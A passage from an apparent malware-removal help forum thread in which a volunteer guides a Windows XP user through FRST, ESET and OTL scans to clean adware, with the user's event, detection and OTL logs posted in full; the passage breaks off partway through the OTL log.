Error: (08/18/2014 10:53:01 PM) (Source: LoadPerf) (EventID: 3012) (User: )
Description: The performance strings in the Performance registry value is corrupted when
process Performance extension counter provider. BaseIndex value from Performance
registry is the first DWORD in Data section, LastCounter value is the second
DWORD in Data section, and LastHelp value is the third DWORD in Data section.


System errors:
=============
Error: (08/21/2014 09:23:01 PM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: The Computer Browser service depends on the Workstation service which failed to start because of the following error:
%%1066

Error: (08/21/2014 09:23:01 PM) (Source: Service Control Manager) (EventID: 7024) (User: )
Description: The Workstation service terminated with service-specific error 2250 (0x8CA).

Error: (08/21/2014 09:23:01 PM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: The Computer Browser service depends on the Workstation service which failed to start because of the following error:
%%1066

Error: (08/21/2014 09:23:01 PM) (Source: Service Control Manager) (EventID: 7024) (User: )
Description: The Workstation service terminated with service-specific error 2250 (0x8CA).

Error: (08/21/2014 09:23:01 PM) (Source: Workstation) (EventID: 5727) (User: )
Description: Could not load RDR device driver.

Error: (08/21/2014 09:23:01 PM) (Source: Workstation) (EventID: 5727) (User: )
Description: Could not load RDR device driver.

Error: (08/21/2014 09:22:55 PM) (Source: Service Control Manager) (EventID: 7026) (User: )
Description: The following boot-start or system-start driver(s) failed to load:
ssnfd

Error: (08/21/2014 09:22:42 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The SupportSoft Listener Service service failed to start due to the following error:
%%2

Error: (08/21/2014 09:22:42 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The Intuit Update Service service failed to start due to the following error:
%%2

Error: (08/21/2014 09:22:42 PM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: The Computer Browser service depends on the Workstation service which failed to start because of the following error:
%%1066


Microsoft Office Sessions:
=========================
Error: (11/15/2013 08:21:40 AM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 0, Application Name: Microsoft Office Word, Application Version: 12.0.6545.5000, Microsoft Office Version: 12.0.6425.1000. This session lasted 240120 seconds with 2700 seconds of active time.  This session ended with a crash.


==================== Memory info ===========================

Processor:  Intel® Pentium® D CPU 3.00GHz
Percentage of memory in use: 68%
Total physical RAM: 1014.42 MB
Available physical RAM: 315.61 MB
Total Pagefile: 2442.12 MB
Available Pagefile: 1601.73 MB
Total Virtual: 2047.88 MB
Available Virtual: 1932.08 MB

==================== Drives ================================

Drive c: (ACER) (Fixed) (Total:71.84 GB) (Free:33.75 GB) NTFS ==>[Drive with boot components (Windows XP)]
Drive d: (ACERDATA) (Fixed) (Total:72.31 GB) (Free:13.53 GB) FAT32

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (Size: 153.4 GB) (Disk ID: 6025DFE9)
Partition 1: (Not Active) - (Size=4.9 GB) - (Type=12)
Partition 2: (Active) - (Size=71.8 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=72.3 GB) - (Type=0C)

==================== End Of Log ============================

 

 

 

 

-RG

Attached Files


Edited by Starbuck, 22 August 2014 - 09:23 AM.


#6 Starbuck

Starbuck

    'r Brudiwr


  • Malware Response Team
  • 4,149 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Midlands, UK
  • Local time:02:24 PM

Posted 22 August 2014 - 10:25 AM

Hi rockgremlin

That's a nice collection of Adware you have there... let's remove it.

Please download the attached fixlist.txt file (bottom of this post) and save it to C:\Documents and Settings\Jay\My Documents\Downloads.
NOTE.
It's important that both files, FRST and fixlist.txt are in the same location or the fix will not work.

NOTICE: This script was written specifically for this user, for use on that particular machine.
Running this on another machine may cause damage to your operating system


Re-run FRST/FRST64 (which ever is installed ) and press the Fix button just once and wait.

frstfix_zps7db0c905.png

The tool will make a log in the Download folder (Fixlog.txt). Please post this in your next reply.

Also let me know how the system is running after the fix.

Thanks

Attached Files


BBPP6nz.png


#7 rockgremlin

rockgremlin
  • Topic Starter

  • Members
  • 8 posts
  • OFFLINE
  •  
  • Local time:02:24 PM

Posted 23 August 2014 - 10:40 PM

'r Brudiwr

 

First of all, I'm in love with your avatar. Secondly, I've been surfing around different locales on the internet as well as a few local drives and all seems very normal. No more annoying pop-ups at every turn, and overall things seem to run a little faster. If anything else crops up, I'll ring in again. But for now it appears the malware may be deceased...unless you see anything else that needs adjusting.

 

 

Many, many thanks.

 

 

Attached is my log:

 

 

Attached Files



#8 Starbuck

Starbuck

    'r Brudiwr


  • Malware Response Team
  • 4,149 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Midlands, UK
  • Local time:02:24 PM

Posted 24 August 2014 - 02:16 AM

Hi rockgremlin

I'm in love with your avatar.

Thank you :)

unless you see anything else that needs adjusting.

I'd like to double check everything and then have a look at the system using a different tool.
You can't be too careful.


Step 1
I'd like you to do an ESET OnlineScan

You may find it beneficial to close your resident AV program before running the scan.
  • Hold down Control and click on the following link to open ESET OnlineScan in a new window.
    ESET OnlineScan
  • Click the esetOnline.png button.
  • For alternate browsers only: (Microsoft Internet Explorer users can skip these steps)
    • Click on esetSmartInstall.png to download the ESET Smart Installer.
      Save it to your desktop.
    • Double click on the esetSmartInstallDesktopIcon.png icon on your desktop.
  • Check esetAcceptTerms.png
  • Click the esetStart.png button.
  • Accept any security warnings from your browser.
  • Check esetScanArchives.png
  • Make sure that the option Remove found threats is ticked, and the option Scan unwanted applications is checked
  • Click the Start button.
  • ESET will then download updates for itself, install itself, and begin scanning your computer. Please be patient as this can take some time.
  • When the scan completes, push esetListThreats.png
  • Click esetExport.png, and save the file to your desktop using a unique name, such as ESETScan.
    Include the contents of this report in your next reply.
  • Click the esetBack.png button.
  • Click esetFinish.png
A log file will be saved here: C:\Program Files\ESET\ESET Online Scanner\log.txt


Note:
It's been found that on some systems the Eset's Online Scan fails during the database download ( around 20% )
To prevent this happening:
When the Computer scan settings display shows, click the Advanced option, the place a check next to the following (if it is not already checked):

Enable Anti-Stealth technology

eset.png




Step 2
  • Download OTL to your desktop.
    right click on the link and select 'Save Link/Target As'.

    if you have problems, try this download link:
    OTL
  • Double click on the icon to run it. Vista/Windows 7 users right-click and select Run As Administrator.
  • Make sure all other windows are closed and to let it run uninterrupted.
  • When the window appears, underneath Output at the top change it to Minimal Output.
  • Check the boxes beside LOP Check and Purity Check
.

.
Otllatest.png

Now copy the lines in bold below.

netsvcs
msconfig
%SYSTEMDRIVE%\*.*
%systemroot%\system32\Spool\prtprocs\w32x86\*.dll
%systemroot%\*. /mp /s
%systemroot%\system32\*.dll /lockedfiles
%systemroot%\Tasks\*.job /lockedfiles
%systemroot%\system32\drivers\*.sys /lockedfiles
%systemroot%\system32\*.exe /lockedfiles
%systemroot%\System32\config\*.sav
%PROGRAMFILES%\*
%USERPROFILE%\..|smtmp;true;true;true /FP
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU
hklm\software\clients\startmenuinternet|command /rs
hklm\software\clients\startmenuinternet|command /64 /rs
CREATERESTOREPOINT
  • right click in the Custom Scans/Fixes window (under the blue bar) and choose Paste.

    scan-fix.png
    .
  • Click the Run Scan button.

    runscan.png
  • Do not change any settings unless otherwise told to do so. The scan wont take long.
  • When the scan completes, it will open two notepad windows. OTL.Txt and Extras.Txt. These are saved in the same location as OTL.
  • Please copy (Edit->Select All, Edit->Copy) the contents of these files, one at a time, and post them with your next reply.
In your next reply, please submit:
Eset scan report
Both reports from Otl.


Thanks.

BBPP6nz.png


#9 rockgremlin

rockgremlin
  • Topic Starter

  • Members
  • 8 posts
  • OFFLINE
  •  
  • Local time:02:24 PM

Posted 29 August 2014 - 11:51 PM

OKAY, ESET Scan:

 

C:\AdwCleaner\Quarantine\C\Documents and Settings\Jay\LOCALS~1\Temp\CT3286042\CT3286042.xpi.vir    a variant of Win32/Conduit.SearchProtect.N potentially unwanted application    deleted - quarantined
C:\Documents and Settings\Jay\Local Settings\Application Data\CRE\gpaiibklhaneknloaoccoidbaffjjlnb.crx    a variant of Win32/Toolbar.Conduit.AH potentially unwanted application    deleted - quarantined
C:\FRST\Quarantine\C\Documents and Settings\All Users\Application Data\Spybot - Search & Destroy\Recovery\WinDownloadergen17.zip    Win32/Bagle.gen.zip worm    cleaned by deleting - quarantined
C:\FRST\Quarantine\C\Documents and Settings\All Users\Application Data\Spybot - Search & Destroy\Recovery\WinDownloadergen18.zip    Win32/Bagle.gen.zip worm    cleaned by deleting - quarantined
C:\FRST\Quarantine\C\Documents and Settings\All Users\Application Data\Spybot - Search & Destroy\Recovery\WinDownloadergen19.zip    Win32/Bagle.gen.zip worm    cleaned by deleting - quarantined
C:\FRST\Quarantine\C\Documents and Settings\Jay\Application Data\VOPackage\VOPackage.exe    Win32/VOPackage.U potentially unwanted application    deleted - quarantined
C:\FRST\Quarantine\C\Documents and Settings\Jay\Local Settings\Application Data\Linkey\Linkey\Helper.dll    a variant of Win32/Toolbar.SearchSuite.P potentially unwanted application    deleted - quarantined
C:\FRST\Quarantine\C\Program Files\Settings Manager\smdmf\Uninstall.exe\smdmf\Helper.dll    a variant of Win32/Toolbar.SearchSuite.C potentially unwanted application    deleted - quarantined
C:\FRST\Quarantine\C\Program Files\Settings Manager\smdmf\Uninstall.exe\smdmf\Internet Explorer Settings.exe    a variant of Win32/Toolbar.SearchSuite.Q potentially unwanted application    deleted - quarantined
C:\FRST\Quarantine\C\Program Files\Settings Manager\smdmf\Uninstall.exe\smdmf\smdmf.dll    a variant of Win32/Toolbar.SearchSuite.C potentially unwanted application    deleted - quarantined
C:\FRST\Quarantine\C\Program Files\Settings Manager\smdmf\Uninstall.exe\smdmf\smdmfbho.dll    a variant of Win32/Toolbar.SearchSuite.C potentially unwanted application    deleted - quarantined
C:\FRST\Quarantine\C\Program Files\Settings Manager\smdmf\Uninstall.exe\smdmf\smdmfldr.dll    a variant of Win32/Toolbar.SearchSuite.S potentially unwanted application    deleted - quarantined
C:\FRST\Quarantine\C\Program Files\Settings Manager\smdmf\Uninstall.exe\smdmf\smdmfldr_u.dll    a variant of Win32/Toolbar.SearchSuite.S potentially unwanted application    deleted - quarantined
C:\FRST\Quarantine\C\Program Files\Settings Manager\smdmf\Uninstall.exe\smdmf\smdmfmgrc2.cfg    a variant of Win32/AdWare.Bandoo.AG application    cleaned by deleting - quarantined
C:\FRST\Quarantine\C\Program Files\Settings Manager\smdmf\Uninstall.exe\smdmf\SmdmFService.exe    probably a variant of Win32/Toolbar.SearchSuite.D potentially unwanted application    deleted - quarantined
C:\FRST\Quarantine\C\Program Files\Settings Manager\smdmf\Uninstall.exe\smdmf\smdmfu.exe    a variant of Win32/Toolbar.SearchSuite.O potentially unwanted application    deleted - quarantined
C:\FRST\Quarantine\C\Program Files\Settings Manager\smdmf\Uninstall.exe\smdmf\sysapcrt.dll    a variant of Win32/Toolbar.SearchSuite.C potentially unwanted application    deleted - quarantined
C:\Program Files\F978377C-B7D4-4536-8E10-14CA97B13394\xkymsyyrfh.dll    a variant of Win32/AdWare.CouponAmazing.B application    cleaned by deleting - quarantined
C:\Program Files\F978377C-B7D4-4536-8E10-14CA97B13394\znjxnhqeua.exe    a variant of Win32/AdWare.Adpeak.J application    cleaned by deleting - quarantined
C:\System Volume Information\_restore{6878E952-D0C8-4B42-9C1D-8CE4EE7F9B17}\RP1\A0001070.dll    a variant of Win32/SProtector.D potentially unwanted application    deleted - quarantined
C:\System Volume Information\_restore{6878E952-D0C8-4B42-9C1D-8CE4EE7F9B17}\RP1\A0001071.dll    a variant of Win32/SProtector.D potentially unwanted application    deleted - quarantined
C:\System Volume Information\_restore{6878E952-D0C8-4B42-9C1D-8CE4EE7F9B17}\RP1\A0001072.exe    a variant of Win32/AdWare.Adpeak.F application    cleaned by deleting - quarantined
C:\System Volume Information\_restore{6878E952-D0C8-4B42-9C1D-8CE4EE7F9B17}\RP10\A0007501.dll    probably a variant of Win32/Toolbar.SearchSuite.Q potentially unwanted application    deleted - quarantined
C:\System Volume Information\_restore{6878E952-D0C8-4B42-9C1D-8CE4EE7F9B17}\RP10\A0007502.dll    probably a variant of Win32/Toolbar.SearchSuite.Q potentially unwanted application    deleted - quarantined
C:\System Volume Information\_restore{6878E952-D0C8-4B42-9C1D-8CE4EE7F9B17}\RP10\A0007503.dll    probably a variant of Win32/Toolbar.SearchSuite.Q potentially unwanted application    deleted - quarantined
C:\System Volume Information\_restore{6878E952-D0C8-4B42-9C1D-8CE4EE7F9B17}\RP10\A0007504.dll    probably a variant of Win32/Toolbar.SearchSuite.Q potentially unwanted application    deleted - quarantined
C:\System Volume Information\_restore{6878E952-D0C8-4B42-9C1D-8CE4EE7F9B17}\RP10\A0007505.dll    probably a variant of Win32/Toolbar.SearchSuite.Q potentially unwanted application    deleted - quarantined
C:\System Volume Information\_restore{6878E952-D0C8-4B42-9C1D-8CE4EE7F9B17}\RP10\A0007506.dll    probably a variant of Win32/Toolbar.SearchSuite.Q potentially unwanted application    deleted - quarantined
C:\System Volume Information\_restore{6878E952-D0C8-4B42-9C1D-8CE4EE7F9B17}\RP10\A0007507.dll    probably a variant of Win32/Toolbar.SearchSuite.Q potentially unwanted application    deleted - quarantined
C:\System Volume Information\_restore{6878E952-D0C8-4B42-9C1D-8CE4EE7F9B17}\RP10\A0007508.dll    probably a variant of Win32/Toolbar.SearchSuite.Q potentially unwanted application    deleted - quarantined
C:\System Volume Information\_restore{6878E952-D0C8-4B42-9C1D-8CE4EE7F9B17}\RP10\A0007509.dll    probably a variant of Win32/Toolbar.SearchSuite.Q potentially unwanted application    deleted - quarantined
C:\System Volume Information\_restore{6878E952-D0C8-4B42-9C1D-8CE4EE7F9B17}\RP10\A0007510.dll    probably a variant of Win32/Toolbar.SearchSuite.Q potentially unwanted application    deleted - quarantined
C:\System Volume Information\_restore{6878E952-D0C8-4B42-9C1D-8CE4EE7F9B17}\RP10\A0007511.dll    probably a variant of Win32/Toolbar.SearchSuite.Q potentially unwanted application    deleted - quarantined
C:\System Volume Information\_restore{6878E952-D0C8-4B42-9C1D-8CE4EE7F9B17}\RP10\A0007512.dll    probably a variant of Win32/Toolbar.SearchSuite.Q potentially unwanted application    deleted - quarantined
C:\System Volume Information\_restore{6878E952-D0C8-4B42-9C1D-8CE4EE7F9B17}\RP10\A0007513.dll    probably a variant of Win32/Toolbar.SearchSuite.Q potentially unwanted application    deleted - quarantined
C:\System Volume Information\_restore{6878E952-D0C8-4B42-9C1D-8CE4EE7F9B17}\RP10\A0007514.dll    probably a variant of Win32/Toolbar.SearchSuite.Q potentially unwanted application    deleted - quarantined
C:\System Volume Information\_restore{6878E952-D0C8-4B42-9C1D-8CE4EE7F9B17}\RP10\A0007515.dll    probably a variant of Win32/Toolbar.SearchSuite.Q potentially unwanted application    deleted - quarantined
C:\System Volume Information\_restore{6878E952-D0C8-4B42-9C1D-8CE4EE7F9B17}\RP10\A0007516.dll    probably a variant of Win32/Toolbar.SearchSuite.Q potentially unwanted application    deleted - quarantined
C:\System Volume Information\_restore{6878E952-D0C8-4B42-9C1D-8CE4EE7F9B17}\RP10\A0007517.dll    probably a variant of Win32/Toolbar.SearchSuite.Q potentially unwanted application    deleted - quarantined
C:\System Volume Information\_restore{6878E952-D0C8-4B42-9C1D-8CE4EE7F9B17}\RP10\A0007518.dll    probably a variant of Win32/Toolbar.SearchSuite.Q potentially unwanted application    deleted - quarantined
C:\System Volume Information\_restore{6878E952-D0C8-4B42-9C1D-8CE4EE7F9B17}\RP10\A0007519.dll    probably a variant of Win32/Toolbar.SearchSuite.Q potentially unwanted application    deleted - quarantined
C:\System Volume Information\_restore{6878E952-D0C8-4B42-9C1D-8CE4EE7F9B17}\RP10\A0007520.dll    probably a variant of Win32/Toolbar.SearchSuite.Q potentially unwanted application    deleted - quarantined
C:\System Volume Information\_restore{6878E952-D0C8-4B42-9C1D-8CE4EE7F9B17}\RP10\A0007521.dll    probably a variant of Win32/Toolbar.SearchSuite.Q potentially unwanted application    deleted - quarantined
C:\System Volume Information\_restore{6878E952-D0C8-4B42-9C1D-8CE4EE7F9B17}\RP10\A0007522.dll    probably a variant of Win32/Toolbar.SearchSuite.Q potentially unwanted application    deleted - quarantined
C:\System Volume Information\_restore{6878E952-D0C8-4B42-9C1D-8CE4EE7F9B17}\RP10\A0007523.dll    probably a variant of Win32/Toolbar.SearchSuite.Q potentially unwanted application    deleted - quarantined
C:\System Volume Information\_restore{6878E952-D0C8-4B42-9C1D-8CE4EE7F9B17}\RP10\A0007524.dll    probably a variant of Win32/Toolbar.SearchSuite.Q potentially unwanted application    deleted - quarantined
C:\System Volume Information\_restore{6878E952-D0C8-4B42-9C1D-8CE4EE7F9B17}\RP10\A0007525.dll    probably a variant of Win32/Toolbar.SearchSuite.Q potentially unwanted application    deleted - quarantined
C:\System Volume Information\_restore{6878E952-D0C8-4B42-9C1D-8CE4EE7F9B17}\RP10\A0007526.dll    probably a variant of Win32/Toolbar.SearchSuite.Q potentially unwanted application    deleted - quarantined
C:\System Volume Information\_restore{6878E952-D0C8-4B42-9C1D-8CE4EE7F9B17}\RP10\A0007527.dll    probably a variant of Win32/Toolbar.SearchSuite.Q potentially unwanted application    deleted - quarantined
C:\System Volume Information\_restore{6878E952-D0C8-4B42-9C1D-8CE4EE7F9B17}\RP10\A0007528.dll    probably a variant of Win32/Toolbar.SearchSuite.Q potentially unwanted application    deleted - quarantined
C:\System Volume Information\_restore{6878E952-D0C8-4B42-9C1D-8CE4EE7F9B17}\RP10\A0007529.dll    probably a variant of Win32/Toolbar.SearchSuite.Q potentially unwanted application    deleted - quarantined
C:\System Volume Information\_restore{6878E952-D0C8-4B42-9C1D-8CE4EE7F9B17}\RP10\A0007530.dll    Win64/Toolbar.Conduit.B potentially unwanted application    deleted - quarantined
C:\System Volume Information\_restore{6878E952-D0C8-4B42-9C1D-8CE4EE7F9B17}\RP10\A0007531.dll    Win32/Toolbar.Conduit.X potentially unwanted application    deleted - quarantined
C:\System Volume Information\_restore{6878E952-D0C8-4B42-9C1D-8CE4EE7F9B17}\RP10\A0007532.dll    a variant of Win32/Toolbar.Conduit.P potentially unwanted application    deleted - quarantined
C:\System Volume Information\_restore{6878E952-D0C8-4B42-9C1D-8CE4EE7F9B17}\RP10\A0007533.dll    a variant of Win32/Toolbar.Conduit.X potentially unwanted application    deleted - quarantined
C:\System Volume Information\_restore{6878E952-D0C8-4B42-9C1D-8CE4EE7F9B17}\RP2\A0001137.exe    a variant of Win32/AdWare.EoRezo.AU application    cleaned by deleting - quarantined
C:\System Volume Information\_restore{6878E952-D0C8-4B42-9C1D-8CE4EE7F9B17}\RP2\A0001139.exe    a variant of Win32/Adware.EoRezo.AJ application    cleaned by deleting - quarantined
C:\System Volume Information\_restore{6878E952-D0C8-4B42-9C1D-8CE4EE7F9B17}\RP2\A0001144.exe    Win32/AdWare.EoRezo.AW application    cleaned by deleting - quarantined
C:\System Volume Information\_restore{6878E952-D0C8-4B42-9C1D-8CE4EE7F9B17}\RP6\A0006628.dll    a variant of Win32/AdWare.MultiPlug.AY application    cleaned by deleting - quarantined
C:\System Volume Information\_restore{6878E952-D0C8-4B42-9C1D-8CE4EE7F9B17}\RP6\A0006629.exe    a variant of Win32/AdWare.MultiPlug.AG application    cleaned by deleting - quarantined

 

 

OTL Scan:

 

OTL logfile created on: 8/29/2014 9:09:26 PM - Run 1
OTL by OldTimer - Version 3.2.69.0     Folder = C:\Documents and Settings\Jay\Desktop
Windows XP Professional Edition Service Pack 3 (Version = 5.1.2600) - Type = NTWorkstation
Internet Explorer (Version = 7.0.5730.13)
Locale: 00000409 | Country: United States | Language: ENU | Date Format: M/d/yyyy
 
1014.42 Mb Total Physical Memory | 264.36 Mb Available Physical Memory | 26.06% Memory free
2.38 Gb Paging File | 1.77 Gb Available in Paging File | 74.30% Paging File free
Paging file location(s): C:\pagefile.sys 1524 3048 [binary data]
 
%SystemDrive% = C: | %SystemRoot% = C:\WINDOWS | %ProgramFiles% = C:\Program Files
Drive C: | 71.84 Gb Total Space | 31.10 Gb Free Space | 43.29% Space Free | Partition Type: NTFS
Drive D: | 72.31 Gb Total Space | 13.53 Gb Free Space | 18.71% Space Free | Partition Type: FAT32
 
Computer Name: MOLES | User Name: Jay | Logged in as Administrator.
Boot Mode: Normal | Scan Mode: Current user
Company Name Whitelist: Off | Skip Microsoft Files: Off | No Company Name Whitelist: On | File Age = 30 Days
 
========== Processes (SafeList) ==========
 
PRC - C:\Documents and Settings\Jay\Desktop\OTL.scr (OldTimer Tools)
PRC - C:\Program Files\Mozilla Firefox\firefox.exe (Mozilla Corporation)
PRC - C:\Program Files\Java\jre7\bin\jqs.exe (Oracle Corporation)
PRC - C:\Program Files\AVAST Software\Avast\AvastUI.exe (AVAST Software)
PRC - C:\Program Files\AVAST Software\Avast\AvastSvc.exe (AVAST Software)
PRC - C:\Program Files\AVAST Software\Avast\afwServ.exe (AVAST Software)
PRC - C:\Documents and Settings\Jay\Application Data\Spotify\Data\SpotifyWebHelper.exe (Spotify Ltd)
PRC - C:\Program Files\Microsoft\BingBar\7.1.361.0\SeaPort.EXE (Microsoft Corporation.)
PRC - C:\Program Files\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe (Intuit Inc.)
PRC - C:\Program Files\SUPERAntiSpyware\SASCore.exe (SUPERAntiSpyware.com)
PRC - C:\Program Files\WinZip\WZQKPICK.EXE (WinZip Computing, S.L.)
PRC - C:\WINDOWS\explorer.exe (Microsoft Corporation)
PRC - C:\Acer\Empowering Technology\eRecovery\eRAgent.exe (Acer Inc.)
PRC - C:\Acer\Empowering Technology\eDataSecurity\eDSloader.exe (HiTRUST)
PRC - C:\Program Files\Acer WLAN 11g USB Dongle\ZDWlan.exe (X-Micro Technology Corp.)
 
 
========== Modules (No Company Name) ==========
 
MOD - C:\WINDOWS\assembly\NativeImages_v4.0.30319_32\System.ServiceProce#\2e3fdae8546832614633495638bef8d0\System.ServiceProcess.ni.dll ()
MOD - C:\WINDOWS\assembly\NativeImages_v4.0.30319_32\System.Runtime.Remo#\8556fa9ad747e43a85e107dbeb42659e\System.Runtime.Remoting.ni.dll ()
MOD - C:\WINDOWS\assembly\NativeImages_v4.0.30319_32\System.EnterpriseSe#\6a5f031a28c774f1163af0715c3a6097\System.EnterpriseServices.ni.dll ()
MOD - C:\WINDOWS\assembly\NativeImages_v4.0.30319_32\System.Transactions\fc7255cccb69c45a808b3d7e6abf55c5\System.Transactions.ni.dll ()
MOD - C:\WINDOWS\assembly\NativeImages_v4.0.30319_32\System.Data\b5f67ff59d386021c43b1ee400c00feb\System.Data.ni.dll ()
MOD - C:\WINDOWS\assembly\NativeImages_v4.0.30319_32\System.Windows.Forms\2781e84862746a34f026d0ee179eed2b\System.Windows.Forms.ni.dll ()
MOD - C:\WINDOWS\assembly\NativeImages_v4.0.30319_32\System.Drawing\243ff1822abc8282cb8fee37538170b4\System.Drawing.ni.dll ()
MOD - C:\WINDOWS\assembly\NativeImages_v4.0.30319_32\System.Core\a4b5a1a06d2d7f77258943c8c228a5e0\System.Core.ni.dll ()
MOD - C:\WINDOWS\assembly\NativeImages_v4.0.30319_32\System.Xml\850fa7110c7423c324762c1ad3130219\System.Xml.ni.dll ()
MOD - C:\WINDOWS\assembly\NativeImages_v4.0.30319_32\System.Configuration\991c4e11f571a4074b9c4a5841222338\System.Configuration.ni.dll ()
MOD - C:\WINDOWS\assembly\NativeImages_v4.0.30319_32\System\4c906eb82e6f56aea01b2a7291fab7ea\System.ni.dll ()
MOD - C:\WINDOWS\assembly\NativeImages_v4.0.30319_32\mscorlib\4e62d1d9b7dd2c2d14915abb73c22d50\mscorlib.ni.dll ()
MOD - C:\Program Files\Mozilla Firefox\mozjs.dll ()
MOD - C:\Program Files\AVAST Software\Avast\defs\13082500\algo.dll ()
MOD - C:\Program Files\Common Files\Apple\Apple Application Support\zlib1.dll ()
MOD - C:\Program Files\Common Files\Apple\Apple Application Support\libxml2.dll ()
MOD - C:\Program Files\WinRAR\RarExt.dll ()
MOD - C:\Program Files\FileZilla FTP Client\fzshellext.dll ()
MOD - C:\WINDOWS\system32\CmdLineExt03.dll ()
MOD - C:\Acer\Empowering Technology\eRecovery\it41.dll ()
MOD - C:\Acer\Empowering Technology\eRecovery\imagefile.dll ()
MOD - C:\Program Files\Acer WLAN 11g USB Dongle\ZDWlan.dll ()
MOD - C:\Program Files\Acer WLAN 11g USB Dongle\dot1x_dll.dll ()
MOD - C:\Program Files\Acer WLAN 11g USB Dongle\ssleay32.dll ()
MOD - C:\Program Files\Acer WLAN 11g USB Dongle\libeay32.dll ()
 
 
========== Services (SafeList) ==========
 
SRV - (SmdmFService) -- C:\Program Files\Settings Manager\smdmf\SmdmFService.exe File not found
SRV - (Amazon Download Agent) -- C:\Program Files\Amazon\Amazon Games & Software Downloader\AmazonGSDownloaderService.exe File not found
SRV - (MozillaMaintenance) -- C:\Program Files\Mozilla Maintenance Service\maintenanceservice.exe (Mozilla Foundation)
SRV - (AdobeFlashPlayerUpdateSvc) -- C:\WINDOWS\system32\Macromed\Flash\FlashPlayerUpdateService.exe (Adobe Systems Incorporated)
SRV - (JavaQuickStarterService) -- C:\Program Files\Java\jre7\bin\jqs.exe (Oracle Corporation)
SRV - (avast! Antivirus) -- C:\Program Files\AVAST Software\Avast\AvastSvc.exe (AVAST Software)
SRV - (avast! Firewall) -- C:\Program Files\AVAST Software\Avast\afwServ.exe (AVAST Software)
SRV - (BBUpdate) -- C:\Program Files\Microsoft\BingBar\7.1.361.0\SeaPort.EXE (Microsoft Corporation.)
SRV - (BBSvc) -- C:\Program Files\Microsoft\BingBar\7.1.361.0\BBSvc.EXE (Microsoft Corporation.)
SRV - (IntuitUpdateServiceV4) -- C:\Program Files\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe (Intuit Inc.)
SRV - (!SASCORE) -- C:\Program Files\SUPERAntiSpyware\SASCore.exe (SUPERAntiSpyware.com)
SRV - (SupportSoft RemoteAssist) -- C:\Program Files\Common Files\supportsoft\bin\ssrc.exe (SupportSoft, Inc.)
 
 
========== Driver Services (SafeList) ==========
 
DRV - (WDICA) --  File not found
DRV - (PDRFRAME) --  File not found
DRV - (PDRELI) --  File not found
DRV - (PDFRAME) --  File not found
DRV - (PDCOMP) --  File not found
DRV - (PCIDump) --  File not found
DRV - (lbrtfdc) --  File not found
DRV - (i2omgmt) --  File not found
DRV - (F06DEFF2-5B9C-490D-910F-35D3A9119622) -- C:\Program Files\Settings Manager\smdmf\smdmfmgrc2.cfg File not found
DRV - (Changer) --  File not found
DRV - (netfilter) -- C:\WINDOWS\system32\drivers\netfilter.sys (NetFilterSDK.com)
DRV - (aswSnx) -- C:\WINDOWS\System32\drivers\aswSnx.sys (AVAST Software)
DRV - (aswSP) -- C:\WINDOWS\System32\drivers\aswSP.sys (AVAST Software)
DRV - (aswVmm) -- C:\WINDOWS\System32\drivers\aswVmm.sys ()
DRV - (aswTdi) -- C:\WINDOWS\System32\drivers\aswTdi.sys (AVAST Software)
DRV - (aswRvrt) -- C:\WINDOWS\System32\drivers\aswRvrt.sys ()
DRV - (aswNdis2) -- C:\WINDOWS\System32\drivers\aswNdis2.sys (AVAST Software)
DRV - (aswMonFlt) -- C:\WINDOWS\system32\drivers\aswMonFlt.sys (AVAST Software)
DRV - (aswRdr) -- C:\WINDOWS\System32\drivers\aswRdr.sys (AVAST Software)
DRV - (aswKbd) -- C:\WINDOWS\System32\drivers\aswKbd.sys (AVAST Software)
DRV - (aswFW) -- C:\WINDOWS\System32\drivers\aswFW.sys (AVAST Software)
DRV - (aswFsBlk) -- C:\WINDOWS\System32\drivers\aswFsBlk.sys (AVAST Software)
DRV - (eeCtrl) -- C:\Program Files\Common Files\Symantec Shared\EENGINE\eeCtrl.sys (Symantec Corporation)
DRV - (SASDIFSV) -- C:\Program Files\SUPERAntiSpyware\sasdifsv.sys (SUPERAdBlocker.com and SUPERAntiSpyware.com)
DRV - (SASKUTIL) -- C:\Program Files\SUPERAntiSpyware\SASKUTIL.SYS (SUPERAdBlocker.com and SUPERAntiSpyware.com)
DRV - (aswNdis) -- C:\WINDOWS\system32\drivers\aswNdis.sys (ALWIL Software)
DRV - (symlcbrd) -- C:\WINDOWS\system32\drivers\symlcbrd.sys (Symantec Corporation)
DRV - (yukonwxp) -- C:\WINDOWS\system32\drivers\yk51x86.sys (Marvell)
DRV - (IntcAzAudAddService) -- C:\WINDOWS\system32\drivers\RtkHDAud.Sys (Realtek Semiconductor Corp.)
DRV - (ZD1211BU(ZyDAS) -- C:\WINDOWS\system32\drivers\ZD1211BU.sys (ZyDAS Technology Corporation)
DRV - (ZD1211U(ZyDAS) -- C:\WINDOWS\system32\drivers\ZD1211U.sys (ZyDAS Technology Corporation)
DRV - (ZDPSp50) -- C:\WINDOWS\system32\drivers\ZDPSp50.sys (Printing Communications Assoc., Inc. (PCAUSA))
 
 
========== Standard Registry (SafeList) ==========
 
 
========== Internet Explorer ==========
 
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Local Page = %SystemRoot%\system32\blank.htm
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = http://www.google.com
IE - HKLM\..\SearchScopes,DefaultScope = {0633EE93-D776-472f-A0FF-E1416B8B2E3A}
IE - HKLM\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = http://www.bing.com/search?q={searchTerms}&FORM=IE8SRC
IE - HKLM\..\SearchScopes\{6A1806CD-94D4-4689-BA73-E35EA1EA9990}: "URL" = http://www.google.com/search?q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&sourceid=ie7
 
IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,SearchMigratedDefaultName = Search
